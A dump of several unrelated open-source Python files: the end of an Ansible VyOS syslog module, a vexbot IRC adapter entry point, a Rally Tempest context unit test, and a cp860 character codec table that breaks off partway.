if w['name']:
commands.append('delete system syslog {0} {1} facility {2} level {3}'.format(
dest, name, facility, level))
else:
commands.append('delete system syslog {0} facility {1} level {2}'.format(
dest, facility, level))
elif state == 'present' and w not in have:
if w['name']:
commands.append('set system syslog {0} {1} facility {2} level {3}'.format(
dest, name, facility, level))
else:
commands.append('set system syslog {0} facility {1} level {2}'.format(
dest, facility, level))
return commands
def config_to_dict(module):
data = get_config(module)
obj = []
for line in data.split('\n'):
if line.startswith('set system syslog'):
match = re.search(r'set system syslog (\S+)', line, re.M)
dest = match.group(1)
if dest == 'host':
match = re.search(r'host (\S+)', line, re.M)
name = match.group(1)
elif dest == 'file':
match = re.search(r'file (\S+)', line, re.M)
name = match.group(1)
elif dest == 'user':
match = re.search(r'user (\S+)', line, re.M)
name = match.group(1)
else:
name = None
if 'facility' in line:
match = re.search(r'facility (\S+)', line, re.M)
facility = match.group(1)
if 'level' in line:
match = re.search(r'level (\S+)', line, re.M)
level = match.group(1).strip("'")
obj.append({'dest': dest,
'name': name,
'facility': facility,
'level': level})
return obj
def map_params_to_obj(module, required_if=None):
obj = []
aggregate = module.params.get('aggregate')
if aggregate:
for item in aggregate:
for key in item:
if item.get(key) is None:
item[key] = module.params[key]
module._check_required_if(required_if, item)
obj.append(item.copy())
else:
if module.params['dest'] not in ('host', 'file', 'user'):
module.params['name'] = None
obj.append({
'dest': module.params['dest'],
'name': module.params['name'],
'facility': module.params['facility'],
'level': module.params['level'],
'state': module.params['state']
})
return obj
def main():
""" main entry point for module execution
"""
element_spec = dict(
dest=dict(type='str', choices=['console', 'file', 'global', 'host', 'user']),
name=dict(type='str'),
facility=dict(type='str'),
level=dict(type='str'),
state=dict(default='present', choices=['present', 'absent']),
)
aggregate_spec = deepcopy(element_spec)
# remove default in aggregate spec, to handle common arguments
remove_default_spec(aggregate_spec)
argument_spec = dict(
aggregate=dict(type='list', elements='dict', options=aggregate_spec),
)
argument_spec.update(element_spec)
argument_spec.update(vyos_argument_spec)
required_if = [('dest', 'host', ['name', 'facility', 'level']),
('dest', 'file', ['name', 'facility', 'level']),
('dest', 'user', ['name', 'facility', 'level']),
('dest', 'console', ['facility', 'level']),
('dest', 'global', ['facility', 'level'])]
module = AnsibleModule(argument_spec=argument_spec,
required_if=required_if,
supports_check_mode=True)
warnings = list()
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module, required_if=required_if)
have = config_to_dict(module)
commands = spec_to_commands((want, have), module)
result['commands'] = commands
if commands:
commit = not module.check_mode
load_config(module, commands, commit=commit)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
benhoff/vex | vexbot/adapters/irc/__main__.py | 2 | 3015 | import sys
import atexit
import signal
from vexbot._version import __version__ as version
from vexbot.adapters.irc import IrcInterface
"""
try:
pkg_resources.get_distribution('irc3')
except pkg_resources.DistributionNotFound:
_IRC3_INSTALLED = False
if _IRC3_INSTALLED:
import irc3
else:
pass
"""
import irc3
from irc3 import utils
def main(**kwargs):
"""
if not _IRC3_INSTALLED:
logging.error('vexbot_irc requires `irc3` to be installed. Please install '
'using `pip install irc3`')
sys.exit(1)
"""
config = _from_argv(irc3.IrcBot, kwargs=kwargs)
if not 'includes' in config:
config['includes'] = []
message_plug = 'vexbot.adapters.irc.echo_to_message'
if not message_plug in config['includes']:
config['includes'].append(message_plug)
service_name = config.get('service_name', 'irc')
connection = config.get('connection', {})
interface = IrcInterface(service_name, irc_config=config, connection=connection)
interface.run()
sys.exit()
# NOTE: This code is from `irc3`
def _from_argv(cls, argv=None, **kwargs) -> dict:
prog = cls.server and 'irc3d' or 'irc3'
# TODO: Add in publish ports and all that jazz.
doc = """
Run an __main__.py instance from a config file
Usage: __main__.py [options] <config>...
Options:
-h, --help Display this help and exit
--version Output version information and exit
--logdir DIRECTORY Log directory to use instead of stderr
--logdate Show datetimes in console output
--host HOST Server name or ip
--port PORT Server port
-v,--verbose Increase verbosity
-r,--raw Show raw irc log on the console
-d,--debug Add some debug commands/utils
"""
import os
import docopt
import textwrap
args = argv or sys.argv[1:]
args = docopt.docopt(doc, args, version=version)
cfg = utils.parse_config(
cls.server and 'server' or 'bot', *args['<config>'])
cfg.update(
verbose=args['--verbose'],
debug=args['--debug'],
)
cfg.update(kwargs)
if args['--host']: # pragma: no cover
host = args['--host']
cfg['host'] = host
if host in ('127.0.0.1', 'localhost'):
cfg['ssl'] = False
if args['--port']: # pragma: no cover
cfg['port'] = args['--port']
if args['--logdir'] or 'logdir' in cfg:
logdir = os.path.expanduser(args['--logdir'] or cfg.get('logdir'))
cls.logging_config = config.get_file_config(logdir)
if args['--logdate']: # pragma: no cover
fmt = cls.logging_config['formatters']['console']
fmt['format'] = config.TIMESTAMPED_FMT
if args.get('--help-page'): # pragma: no cover
for v in cls.logging_config['handlers'].values():
v['level'] = 'ERROR'
if args['--raw']:
cfg['raw'] = True
return cfg
if __name__ == '__main__':
main()
| gpl-3.0 |
gluke77/rally | tests/unit/plugins/openstack/context/not_for_production/test_tempest.py | 13 | 4489 | # Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from rally import exceptions
from rally.plugins.openstack.context.not_for_production import tempest
from rally.verification.tempest import tempest as tempest_verifier
from tests.unit import test
CONTEXT = "rally.plugins.openstack.context.not_for_production.tempest"
TEMPEST = "rally.verification.tempest.tempest"
class TempestContextTestCase(test.TestCase):
def setUp(self):
super(TempestContextTestCase, self).setUp()
task = mock.MagicMock()
task.task.deployment_uuid.return_value = "fake_uuid"
self.context = {"task": task}
@mock.patch(CONTEXT + ".os.mkdir")
@mock.patch(TEMPEST + ".Tempest.generate_config_file")
@mock.patch(TEMPEST + ".Tempest.is_configured", return_value=True)
@mock.patch(TEMPEST + ".Tempest.install")
@mock.patch(TEMPEST + ".Tempest.is_installed", return_value=True)
def test_setup(
self, mock_tempest_is_installed, mock_tempest_install,
mock_tempest_is_configured, mock_tempest_generate_config_file,
mock_mkdir):
benchmark = tempest.Tempest(self.context)
benchmark.setup()
self.assertEqual(0, mock_tempest_install.call_count)
self.assertEqual(0, mock_tempest_generate_config_file.call_count)
self.assertEqual("/dev/null", benchmark.verifier.log_file_raw)
@mock.patch(CONTEXT + ".os.mkdir")
@mock.patch(TEMPEST + ".Tempest.is_configured")
@mock.patch(TEMPEST + ".Tempest.is_installed", return_value=False)
@mock.patch(TEMPEST + ".Tempest.install")
def test_setup_failure_on_tempest_installation(
self, mock_tempest_install, mock_tempest_is_installed,
mock_tempest_is_configured, mock_mkdir):
mock_tempest_install.side_effect = (
tempest_verifier.TempestSetupFailure()
)
benchmark = tempest.Tempest(self.context)
self.assertRaises(exceptions.BenchmarkSetupFailure, benchmark.setup)
self.assertEqual(0, mock_tempest_is_configured.call_count)
@mock.patch(CONTEXT + ".os.mkdir")
@mock.patch(TEMPEST + ".Tempest.is_configured", return_value=False)
@mock.patch(TEMPEST + ".Tempest.is_installed", return_value=True)
@mock.patch(TEMPEST + ".Tempest.generate_config_file")
def test_setup_failure_on_tempest_configuration(
self, mock_tempest_generate_config_file, mock_tempest_is_installed,
mock_tempest_is_configured, mock_mkdir):
mock_tempest_generate_config_file.side_effect = (
exceptions.TempestConfigCreationFailure()
)
benchmark = tempest.Tempest(self.context)
self.assertRaises(exceptions.BenchmarkSetupFailure, benchmark.setup)
self.assertEqual(1, mock_tempest_is_configured.call_count)
@mock.patch(CONTEXT + ".os.mkdir")
@mock.patch(TEMPEST + ".Tempest.is_configured", return_value=False)
@mock.patch(TEMPEST + ".Tempest.is_installed", return_value=True)
@mock.patch(TEMPEST + ".Tempest.generate_config_file")
def test_setup_with_no_configuration(
self, mock_tempest_generate_config_file, mock_tempest_is_installed,
mock_tempest_is_configured, mock_mkdir):
benchmark = tempest.Tempest(self.context)
benchmark.setup()
self.assertEqual(1, mock_tempest_is_installed.call_count)
self.assertEqual("/dev/null", benchmark.verifier.log_file_raw)
self.assertEqual(1, mock_tempest_generate_config_file.call_count)
@mock.patch(CONTEXT + ".os.path.exists", return_value=True)
@mock.patch(CONTEXT + ".shutil")
def test_cleanup(self, mock_shutil, mock_exists):
benchmark = tempest.Tempest(self.context)
benchmark.verifier = mock.MagicMock()
benchmark.results_dir = "/tmp/path"
benchmark.cleanup()
mock_shutil.rmtree.assert_called_once_with("/tmp/path")
| apache-2.0 |
blois/AndroidSDKCloneMin | ndk/prebuilt/linux-x86_64/lib/python2.7/encodings/cp860.py | 593 | 34937 | """ Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP860.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp860',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c7, # LATIN CAPITAL LETTER C WITH CEDILLA
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x00e2, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x0084: 0x00e3, # LATIN SMALL LETTER A WITH TILDE
0x0085: 0x00e0, # LATIN SMALL LETTER A WITH GRAVE
0x0086: 0x00c1, # LATIN CAPITAL LETTER A WITH ACUTE
0x0087: 0x00e7, # LATIN SMALL LETTER C WITH CEDILLA
0x0088: 0x00ea, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x0089: 0x00ca, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x008a: 0x00e8, # LATIN SMALL LETTER E WITH GRAVE
0x008b: 0x00cd, # LATIN CAPITAL LETTER I WITH ACUTE
0x008c: 0x00d4, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x008d: 0x00ec, # LATIN SMALL LETTER I WITH GRAVE
0x008e: 0x00c3, # LATIN CAPITAL LETTER A WITH TILDE
0x008f: 0x00c2, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00c0, # LATIN CAPITAL LETTER A WITH GRAVE
0x0092: 0x00c8, # LATIN CAPITAL LETTER E WITH GRAVE
0x0093: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x0094: 0x00f5, # LATIN SMALL LETTER O WITH TILDE
0x0095: 0x00f2, # LATIN SMALL LETTER O WITH GRAVE
0x0096: 0x00da, # LATIN CAPITAL LETTER U WITH ACUTE
0x0097: 0x00f9, # LATIN SMALL LETTER U WITH GRAVE
0x0098: 0x00cc, # LATIN CAPITAL LETTER I WITH GRAVE
0x0099: 0x00d5, # LATIN CAPITAL LETTER O WITH TILDE
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00a2, # CENT SIGN
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00d9, # LATIN CAPITAL LETTER U WITH GRAVE
0x009e: 0x20a7, # PESETA SIGN
0x009f: 0x00d3, # LATIN CAPITAL LETTER O WITH ACUTE
0x00a0: 0x00e1, # LATIN SMALL LETTER A WITH ACUTE
0x00a1: 0x00ed, # LATIN SMALL LETTER I WITH ACUTE
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x00a4: 0x00f1, # LATIN SMALL LETTER N WITH TILDE
0x00a5: 0x00d1, # LATIN CAPITAL LETTER N WITH TILDE
0x00a6: 0x00aa, # FEMININE ORDINAL INDICATOR
0x00a7: 0x00ba, # MASCULINE ORDINAL INDICATOR
0x00a8: 0x00bf, # INVERTED QUESTION MARK
0x00a9: 0x00d2, # LATIN CAPITAL LETTER O WITH GRAVE
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x00a1, # INVERTED EXCLAMATION MARK
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03b1, # GREEK SMALL LETTER ALPHA
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S
0x00e2: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x00e3: 0x03c0, # GREEK SMALL LETTER PI
0x00e4: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x00e5: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x03c4, # GREEK SMALL LETTER TAU
0x00e8: 0x03a6, # GREEK CAPITAL LETTER PHI
0x00e9: 0x0398, # GREEK CAPITAL LETTER THETA
0x00ea: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x00eb: 0x03b4, # GREEK SMALL LETTER DELTA
0x00ec: 0x221e, # INFINITY
0x00ed: 0x03c6, # GREEK SMALL LETTER PHI
0x00ee: 0x03b5, # GREEK SMALL LETTER EPSILON
0x00ef: 0x2229, # INTERSECTION
0x00f0: 0x2261, # IDENTICAL TO
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x2320, # TOP HALF INTEGRAL
0x00f5: 0x2321, # BOTTOM HALF INTEGRAL
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
u'\x00' # 0x0000 -> NULL
u'\x01' # 0x0001 -> START OF HEADING
u'\x02' # 0x0002 -> START OF TEXT
u'\x03' # 0x0003 -> END OF TEXT
u'\x04' # 0x0004 -> END OF TRANSMISSION
u'\x05' # 0x0005 -> ENQUIRY
u'\x06' # 0x0006 -> ACKNOWLEDGE
u'\x07' # 0x0007 -> BELL
u'\x08' # 0x0008 -> BACKSPACE
u'\t' # 0x0009 -> HORIZONTAL TABULATION
u'\n' # 0x000a -> LINE FEED
u'\x0b' # 0x000b -> VERTICAL TABULATION
u'\x0c' # 0x000c -> FORM FEED
u'\r' # 0x000d -> CARRIAGE RETURN
u'\x0e' # 0x000e -> SHIFT OUT
u'\x0f' # 0x000f -> SHIFT IN
u'\x10' # 0x0010 -> DATA LINK ESCAPE
u'\x11' # 0x0011 -> DEVICE CONTROL ONE
u'\x12' # 0x0012 -> DEVICE CONTROL TWO
u'\x13' # 0x0013 -> DEVICE CONTROL THREE
u'\x14' # 0x0014 -> DEVICE CONTROL FOUR
u'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x0016 -> SYNCHRONOUS IDLE
u'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x0018 -> CANCEL
u'\x19' # 0x0019 -> END OF MEDIUM
u'\x1a' # 0x001a -> SUBSTITUTE
u'\x1b' # 0x001b -> ESCAPE
u'\x1c' # 0x001c -> FILE SEPARATOR
u'\x1d' # 0x001d -> GROUP SEPARATOR
u'\x1e' # 0x001e -> RECORD SEPARATOR
u'\x1f' # 0x001f -> UNIT SEPARATOR
u' ' # 0x0020 -> SPACE
u'!' # 0x0021 -> EXCLAMATION MARK
u'"' # 0x0022 -> QUOTATION MARK
u'#' # 0x0023 -> NUMBER SIGN
u'$' # 0x0024 -> DOLLAR SIGN
u'%' # 0x0025 -> PERCENT SIGN
u'&' # 0x0026 -> AMPERSAND
u"'" # 0x0027 -> APOSTROPHE
u'(' # 0x0028 -> LEFT PARENTHESIS
u')' # 0x0029 -> RIGHT PARENTHESIS
u'*' # 0x002a -> ASTERISK
u'+' # 0x002b -> PLUS SIGN
u',' # 0x002c -> COMMA
u'-' # 0x002d -> HYPHEN-MINUS
u'.' # 0x002e -> FULL STOP
u'/' # 0x002f -> SOLIDUS
u'0' # 0x0030 -> DIGIT ZERO
u'1' # 0x0031 -> DIGIT ONE
u'2' # 0x0032 -> DIGIT TWO
u'3' # 0x0033 -> DIGIT THREE
u'4' # 0x0034 -> DIGIT FOUR
u'5' # 0x0035 -> DIGIT FIVE
u'6' # 0x0036 -> DIGIT SIX
u'7' # 0x0037 -> DIGIT SEVEN
u'8' # 0x0038 -> DIGIT EIGHT
u'9' # 0x0039 -> DIGIT NINE
u':' # 0x003a -> COLON
u';' # 0x003b -> SEMICOLON
u'<' # 0x003c -> LESS-THAN SIGN
u'=' # 0x003d -> EQUALS SIGN
u'>' # 0x003e -> GREATER-THAN SIGN
u'?' # 0x003f -> QUESTION MARK
u'@' # 0x0040 -> COMMERCIAL AT
u'A' # 0x0041 -> LATIN CAPITAL LETTER A
u'B' # 0x0042 -> LATIN CAPITAL LETTER B
u'C' # 0x0043 -> LATIN CAPITAL LETTER C
u'D' # 0x0044 -> LATIN CAPITAL LETTER D
u'E' # 0x0045 -> LATIN CAPITAL LETTER E
u'F' # 0x0046 -> LATIN CAPITAL LETTER F
u'G' # 0x0047 -> LATIN CAPITAL LETTER G
u'H' # 0x0048 -> LATIN CAPITAL LETTER H
u'I' # 0x0049 -> LATIN CAPITAL LETTER I
u'J' # 0x004a -> LATIN CAPITAL LETTER J
u'K' # 0x004b -> LATIN CAPITAL LETTER K
u'L' # 0x004c -> LATIN CAPITAL LETTER L
u'M' # 0x004d -> LATIN CAPITAL LETTER M
u'N' # 0x004e -> LATIN CAPITAL LETTER N
u'O' # 0x004f -> LATIN CAPITAL LETTER O
u'P' # 0x0050 -> LATIN CAPITAL LETTER P
u'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
u'R' # 0x0052 -> LATIN CAPITAL LETTER R
u'S' # 0x0053 -> LATIN CAPITAL LETTER S
u'T' # 0x0054 -> LATIN CAPITAL LETTER T
u'U' # 0x0055 -> LATIN CAPITAL LETTER U
u'V' # 0x0056 -> LATIN CAPITAL LETTER V
u'W' # 0x0057 -> LATIN CAPITAL LETTER W
u'X' # 0x0058 -> LATIN CAPITAL LETTER X
u'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
u'Z' # 0x005a -> LATIN CAPITAL LETTER Z
u'[' # 0x005b -> LEFT SQUARE BRACKET
u'\\' # 0x005c -> REVERSE SOLIDUS
u']' # 0x005d -> RIGHT SQUARE BRACKET
u'^' # 0x005e -> CIRCUMFLEX ACCENT
u'_' # 0x005f -> LOW LINE
u'`' # 0x0060 -> GRAVE ACCENT
u'a' # 0x0061 -> LATIN SMALL LETTER A
u'b' # 0x0062 -> LATIN SMALL LETTER B
u'c' # 0x0063 -> LATIN SMALL LETTER C
u'd' # 0x0064 -> LATIN SMALL LETTER D
u'e' # 0x0065 -> LATIN SMALL LETTER E
u'f' # 0x0066 -> LATIN SMALL LETTER F
u'g' # 0x0067 -> LATIN SMALL LETTER G
u'h' # 0x0068 -> LATIN SMALL LETTER H
u'i' # 0x0069 -> LATIN SMALL LETTER I
u'j' # 0x006a -> LATIN SMALL LETTER J
u'k' # 0x006b -> LATIN SMALL LETTER K
u'l' # 0x006c -> LATIN SMALL LETTER L
u'm' # 0x006d -> LATIN SMALL LETTER M
u'n' # 0x006e -> LATIN SMALL LETTER N
u'o' # 0x006f -> LATIN SMALL LETTER O
u'p' # 0x0070 -> LATIN SMALL LETTER P
u'q' # 0x0071 -> LATIN SMALL LETTER Q
u'r' # 0x0072 -> LATIN SMALL LETTER R
u's' # 0x0073 -> LATIN SMALL LETTER S
u't' # 0x0074 -> LATIN SMALL LETTER T
u'u' # 0x0075 -> LATIN SMALL LETTER U
u'v' # 0x0076 -> LATIN SMALL LETTER V
u'w' # 0x0077 -> LATIN SMALL LETTER W
u'x' # 0x0078 -> LATIN SMALL LETTER X
u'y' # 0x0079 -> LATIN SMALL LETTER Y
u'z' # 0x007a -> LATIN SMALL LETTER Z
u'{' # 0x007b -> LEFT CURLY BRACKET
u'|' # 0x007c -> VERTICAL LINE
u'}' # 0x007d -> RIGHT CURLY BRACKET
u'~' # 0x007e -> TILDE
u'\x7f' # 0x007f -> DELETE
u'\xc7' # 0x0080 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xfc' # 0x0081 -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xe9' # 0x0082 -> LATIN SMALL LETTER E WITH ACUTE
u'\xe2' # 0x0083 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe3' # 0x0084 -> LATIN SMALL LETTER A WITH TILDE
u'\xe0' # 0x0085 -> LATIN SMALL LETTER A WITH GRAVE
u'\xc1' # 0x0086 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xe7' # 0x0087 -> LATIN SMALL LETTER C WITH CEDILLA
u'\xea' # 0x0088 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xca' # 0x0089 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xe8' # 0x008a -> LATIN SMALL LETTER E WITH GRAVE
u'\xcd' # 0x008b -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xd4' # 0x008c -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\xec' # 0x008d -> LATIN SMALL LETTER I WITH GRAVE
u'\xc3' # 0x008e -> LATIN CAPITAL LETTER A WITH TILDE
u'\xc2' # 0x008f -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xc9' # 0x0090 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xc0' # 0x0091 -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc8' # 0x0092 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xf4' # 0x0093 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf5' # 0x0094 -> LATIN SMALL LETTER O WITH TILDE
u'\xf2' # 0x0095 -> LATIN SMALL LETTER O WITH GRAVE
u'\xda' # 0x0096 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xf9' # 0x0097 -> LATIN SMALL LETTER U WITH GRAVE
u'\xcc' # 0x0098 -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xd5' # 0x0099 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xdc' # 0x009a -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xa2' # 0x009b -> CENT SIGN
u'\xa3' # 0x009c -> POUND SIGN
u'\xd9' # 0x009d -> LATIN CAPITAL LETTER U WITH GRAVE
u'\u20a7' # 0x009e -> PESETA SIGN
u'\xd3' # 0x009f -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xe1' # 0x00a0 -> LATIN SMALL LETTER A WITH ACUTE
u'\xed' # 0x00a1 -> LATIN SMALL LETTER I WITH ACUTE
u'\xf3' # 0x00a2 -> LATIN SMALL LETTER O WITH ACUTE
u'\xfa' # 0x00a3 -> LATIN SMALL LETTER U WITH ACUTE
u'\xf1' # 0x00a4 -> LATIN SMALL LETTER N WITH TILDE
u'\xd1' # 0x00a5 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xaa' # 0x00a6 -> FEMININE ORDINAL INDICATOR
u'\xba' # 0x00a7 -> MASCULINE ORDINAL INDICATOR
u'\xbf' # 0x00a8 -> INVERTED QUESTION MARK
u'\xd2' # 0x00a9 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xac' # 0x00aa -> NOT SIGN
u'\xbd' # 0x00ab -> VULGAR FRACTION ONE HALF
u'\xbc' # 0x00ac -> VULGAR FRACTION ONE QUARTER
u'\xa1' # 0x00ad -> INVERTED EXCLAMATION MARK
u'\xab' # 0x00ae -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0x00af -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2591' # 0x00b0 -> LIGHT SHADE
u'\u2592' # 0x00b1 -> MEDIUM SHADE
u'\u2593' # 0x00b2 -> DARK SHADE
u'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
u'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\u2561' # 0x00b5 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
u'\u2562' # 0x00b6 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
u'\u2556' # 0x00b7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
u'\u2555' # 0x00b8 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
u'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
